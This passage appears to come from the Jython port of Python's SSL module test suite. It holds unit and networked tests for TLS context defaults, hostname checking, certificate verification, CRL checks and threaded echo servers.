ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
# getattr(ssl, "OP_SINGLE_DH_USE", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# )
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
@unittest.skipIf(support.is_jython, "TODO")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
@unittest.skipIf(support.is_jython, "TODO")
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(errno.EISCONN, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
# Jython added EALREADY, as in Jython connect may have already happened
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
#self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == errno.EISCONN:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(support.is_jython, "Can't use a socket as a file under Jython")
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI or support.is_jython: # sha256.tbs-internet.com is no longer alive
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
@unittest.skipIf(support.is_jython, "On jython preloaded TODO")
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 3)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
# Jython: force-skip the threaded tests for now, they really don't work :(
_have_threads = False
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
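# A short accept() timeout lets the loop below re-check self.active and
# shut down promptly once stop() has been called.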
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
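# Decrypted records may already be buffered inside the SSL layer where
# select() cannot see them, so drain any pending data before returning.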
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
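# Drive the non-blocking handshake; SSLWantReadError/SSLWantWriteError just
# mean "retry once the underlying socket is ready again".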
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with closing(socket.socket()) as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except IOError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\nIOError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
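# Exercise the echo round-trip with several bytes-like types
# (bytes, bytearray and memoryview all go through the same write path).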
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
